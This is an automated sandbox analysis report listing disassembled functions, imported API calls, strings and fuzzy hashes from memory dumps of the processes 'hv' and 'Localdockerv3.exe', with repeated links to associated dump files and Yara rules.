Associated: 00000003.00000002.1553940938.000000006C70F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553983544.000000006C713000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1554011564.000000006C71B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1554033542.000000006C71F000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c2d0000_hv.jbxd

Similarity

API ID: #214
String ID: Link$Rect$Subtype
API String ID: 1405426997-3862875103
Opcode ID: b13151f83b9e69bbbe14fa3c4d3e41fa1b8336e40ccb261fc66cd86d8cc6c111
Instruction ID: ccad8df06f60189834e12005d6ca8e20fcbdec633ac269785096852fe018f0f1
Opcode Fuzzy Hash: b13151f83b9e69bbbe14fa3c4d3e41fa1b8336e40ccb261fc66cd86d8cc6c111
Instruction Fuzzy Hash: A6C1F531B002198FDF04DF69C9949AEB7B9EF99218B100529DD16ABF41DB32ED05CBA1

Function 6C3AD760 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 385COMMON

Download Yara Rule

APIs

#73.IEPDF32(?), ref: 6C3AD777

Part of subcall function 6C3ACEE0: #70.IEPDF32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6C3ACEEB

#73.IEPDF32(?), ref: 6C3AD80A
#73.IEPDF32(00000000,?,?,Rect), ref: 6C3AD915

Strings

Rect, xrefs: 6C3AD8F7, 6C3ADAD0
BBox, xrefs: 6C3AD98A, 6C3ADA00

Memory Dump Source

Source File: 00000003.00000002.1546421268.000000006C386000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2D0000, based on PE: true

Associated: 00000003.00000002.1546395387.000000006C2D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C2D1000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C2DA000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C414000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C443000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C447000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C456000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C53A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C55B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C565000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5E6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5F2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C62F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C666000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C67C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C695000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6BA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C707000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C70B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553940938.000000006C70F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553983544.000000006C713000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1554011564.000000006C71B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1554033542.000000006C71F000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c2d0000_hv.jbxd

Similarity

API ID:
String ID: BBox$Rect
API String ID: 0-3854271352
Opcode ID: ae9e95ac2c9a37a3e01b7ec34b0973e56e627c10a262a49111c1a6910d3fa212
Instruction ID: b566128e49a950789f56f16b25289def73c5ba42717d961bbd33b89acf0cbac8
Opcode Fuzzy Hash: ae9e95ac2c9a37a3e01b7ec34b0973e56e627c10a262a49111c1a6910d3fa212
Instruction Fuzzy Hash: 73C1F771B012199FDB04DFA5D880AAEB7B5FF89758F100128ED55ABB40DB31E916CFA0

Function 6C3AE610 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

Type, xrefs: 6C3AF1E9
Annot, xrefs: 6C3AF201

Memory Dump Source

Source File: 00000003.00000002.1546421268.000000006C386000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2D0000, based on PE: true

Associated: 00000003.00000002.1546395387.000000006C2D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C2D1000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C2DA000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C414000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C443000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C447000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C456000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C53A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C55B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C565000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5E6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5F2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C62F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C666000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C67C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C695000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6BA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C707000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C70B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553940938.000000006C70F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553983544.000000006C713000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1554011564.000000006C71B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1554033542.000000006C71F000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c2d0000_hv.jbxd

Similarity

API ID:
String ID: Annot$Type
API String ID: 0-395718979
Opcode ID: c85bffbf56741e9872f73d277ac25b99df2bedaa6baff283ab2481a4332347bc
Instruction ID: cfa1a04880aa950b7c557cdbf575d8d8d63b0e9503fb315a9a64929f43fe31da
Opcode Fuzzy Hash: c85bffbf56741e9872f73d277ac25b99df2bedaa6baff283ab2481a4332347bc
Instruction Fuzzy Hash: A4B1E435B003188FEB14DFA5C8816AEB7B5FF89344F004969D959ABB40EB31A916CF91

Function 6C3B3AB0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1546421268.000000006C386000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2D0000, based on PE: true

Associated: 00000003.00000002.1546395387.000000006C2D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C2D1000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C2DA000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C414000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C443000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C447000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C456000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C53A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C55B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C565000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5E6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5F2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C62F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C666000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C67C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C695000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6BA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C707000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C70B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553940938.000000006C70F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553983544.000000006C713000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1554011564.000000006C71B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1554033542.000000006C71F000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c2d0000_hv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61cdb8cdb3b026a28372f95b4d6263aaeaec4f8466463fecebe316e5c686cf62
Instruction ID: ed15809b7062775ea7d9e26e6f1fb698ac5d4fe98bdaf22355f125a90d72078b
Opcode Fuzzy Hash: 61cdb8cdb3b026a28372f95b4d6263aaeaec4f8466463fecebe316e5c686cf62
Instruction Fuzzy Hash: E2810335B017298FDB40DF79C88066AB7B5FF99354F104629EA25ABB40EB30E845CB90

Function 6C38FC6C Relevance: 15.1, APIs: 10, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SetStretchBltMode.GDI32(00000000,00000004), ref: 6C38FC9B
GetObjectType.GDI32(?), ref: 6C38FCA4
CreateBitmap.GDI32 ref: 6C38FCD3
SelectObject.GDI32(?,00000000), ref: 6C38FCDD
GetObjectW.GDI32(00000000,00000018,?), ref: 6C38FCFD
SelectObject.GDI32(?,00000000), ref: 6C38FD21
DeleteObject.GDI32(00000000), ref: 6C38FD28
GetDeviceCaps.GDI32(?,0000000C), ref: 6C38FD3B
GetDeviceCaps.GDI32(?,00000008), ref: 6C38FD45
GetDeviceCaps.GDI32(?,0000000A), ref: 6C38FD4F

Memory Dump Source

Source File: 00000003.00000002.1546421268.000000006C386000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2D0000, based on PE: true

Associated: 00000003.00000002.1546395387.000000006C2D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C2D1000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C2DA000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C414000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C443000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C447000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C456000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C53A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C55B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C565000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5E6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5F2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C62F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C666000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C67C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C695000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6BA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C707000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C70B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553940938.000000006C70F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553983544.000000006C713000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1554011564.000000006C71B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1554033542.000000006C71F000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c2d0000_hv.jbxd

Similarity

API ID: Object$CapsDevice$Select$BitmapCreateDeleteModeStretchType
String ID:
API String ID: 3133578033-0
Opcode ID: 36f3d657d0539ad095e4783a73f73185e013fc97f5768fca35954e34f68aded7
Instruction ID: 6655895a6d333e41f2cd81654b63354f8d8cadbefec3303caa23efe36c407655
Opcode Fuzzy Hash: 36f3d657d0539ad095e4783a73f73185e013fc97f5768fca35954e34f68aded7
Instruction Fuzzy Hash: 293163B1A007449FDB249F34C845A6BBBF4FF49710F008A2DE99686651EB70EA44CBA4

Function 6C3AC670 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112COMMON

Download Yara Rule

APIs

#70.IEPDF32(?), ref: 6C3AC6A5

Strings

.Ul, xrefs: 6C3ACBEB
Subtype, xrefs: 6C3ACCDB
Highlight, xrefs: 6C3ACCF0

Memory Dump Source

Source File: 00000003.00000002.1546421268.000000006C386000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2D0000, based on PE: true

Associated: 00000003.00000002.1546395387.000000006C2D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C2D1000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C2DA000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C414000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C443000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C447000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C456000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C53A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C55B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C565000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5E6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5F2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C62F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C666000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C67C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C695000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6BA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C707000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C70B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553940938.000000006C70F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553983544.000000006C713000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1554011564.000000006C71B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1554033542.000000006C71F000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c2d0000_hv.jbxd

Similarity

API ID:
String ID: .Ul$Highlight$Subtype
API String ID: 0-3869343903
Opcode ID: 2b3a2d085a35befd7a2c7c718dde7534aa23d20a365a170e208a36c10362369c
Instruction ID: 00296f8eb903d24a3cbe6a38ea6e0535a3a97d91f57b965d04f19e8331a6993f
Opcode Fuzzy Hash: 2b3a2d085a35befd7a2c7c718dde7534aa23d20a365a170e208a36c10362369c
Instruction Fuzzy Hash: 74213771B0011D8FEB049EA4A880A7B7369EF88614F110928D9285FB50E733D913CBD0

Function 6C3B2460 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

#214.IEPDF32(?), ref: 6C3B248D
#214.IEPDF32(?,?,?), ref: 6C3B263A

Strings

Rect, xrefs: 6C3B26D7
Subtype, xrefs: 6C3B2530
Link, xrefs: 6C3B2548

Memory Dump Source

Source File: 00000003.00000002.1546421268.000000006C386000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2D0000, based on PE: true

Associated: 00000003.00000002.1546395387.000000006C2D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C2D1000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C2DA000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C414000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C443000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C447000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C456000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C53A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C55B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C565000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5E6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5F2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C62F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C666000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C67C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C695000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6BA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C707000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C70B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553940938.000000006C70F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553983544.000000006C713000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1554011564.000000006C71B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1554033542.000000006C71F000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c2d0000_hv.jbxd

Similarity

API ID: #214
String ID: Link$Rect$Subtype
API String ID: 1405426997-3862875103
Opcode ID: 07c31f49a76f62a774412e0fade39dbd6468ce4c36497ead7aaa774628cd0e1d
Instruction ID: 6908530c43a9202f4557a500cc378f189c57f7f2c519f48be75e69507abce52f
Opcode Fuzzy Hash: 07c31f49a76f62a774412e0fade39dbd6468ce4c36497ead7aaa774628cd0e1d
Instruction Fuzzy Hash: 4551B3317012198FDF00CF68CA946AEB7B5FF58708B140269D856ABB41DB72ED05CFA1

Analysis Process: Localdockerv3.exePID: 1296, Parent PID: 7996COMMON

Non-executed Functions

Function 000000014001048C Relevance: 6.3, APIs: 4, Instructions: 314COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 00000001400104E2

Part of subcall function 00000001400852AC: _cwprintf_s_l.LIBCMT ref: 00000001400852E4

_cwprintf_s_l.LIBCMT ref: 00000001400105DB
_cwprintf_s_l.LIBCMT ref: 000000014001064D
_cwprintf_s_l.LIBCMT ref: 00000001400106EB

Memory Dump Source

Source File: 00000008.00000002.2171334550.0000000140001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2171292207.0000000140000000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_Localdockerv3.jbxd

Similarity

API ID: _cwprintf_s_l
String ID:
API String ID: 2941638530-0
Opcode ID: 09fd3be6d87d3314e842234ac9bfaaf60286fd91aaa6fe79aa6a6f993e03e53e
Instruction ID: f5fd568eb4fa89ef09741f301376edfd5dbb115e4928b6f7acd597c23f9de95b
Opcode Fuzzy Hash: 09fd3be6d87d3314e842234ac9bfaaf60286fd91aaa6fe79aa6a6f993e03e53e
Instruction Fuzzy Hash: 56E1B633205A8086E7628B7AE8553DD33A0F789BB4F444302E7A99B6F2DE7DD4858740

Function 0000000140021A00 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 320COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0000000140021DCF

Strings

@, xrefs: 0000000140021D3A
0, xrefs: 0000000140021AA0

Memory Dump Source

Source File: 00000008.00000002.2171334550.0000000140001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2171292207.0000000140000000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_Localdockerv3.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: 0$@
API String ID: 2941638530-1545510068
Opcode ID: 11cc51ba024c335070304a6cd7586fed144db14e9716be4ba93d075a169ea3cb
Instruction ID: f515dbf1d49814e9e3407b6919e0efcb9013ed6d199b989b111f9ff7d72fbfb8
Opcode Fuzzy Hash: 11cc51ba024c335070304a6cd7586fed144db14e9716be4ba93d075a169ea3cb
Instruction Fuzzy Hash: AFE16B722146C48BE765CF66E8447DEB7A0F3C8B84F548115EB8957B68CB39D865CF00

Function 000000014000D458 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 000000014000D6ED

Strings

H, xrefs: 000000014000D65F
P, xrefs: 000000014000D68D

Memory Dump Source

Source File: 00000008.00000002.2171334550.0000000140001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2171292207.0000000140000000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_Localdockerv3.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: H$P
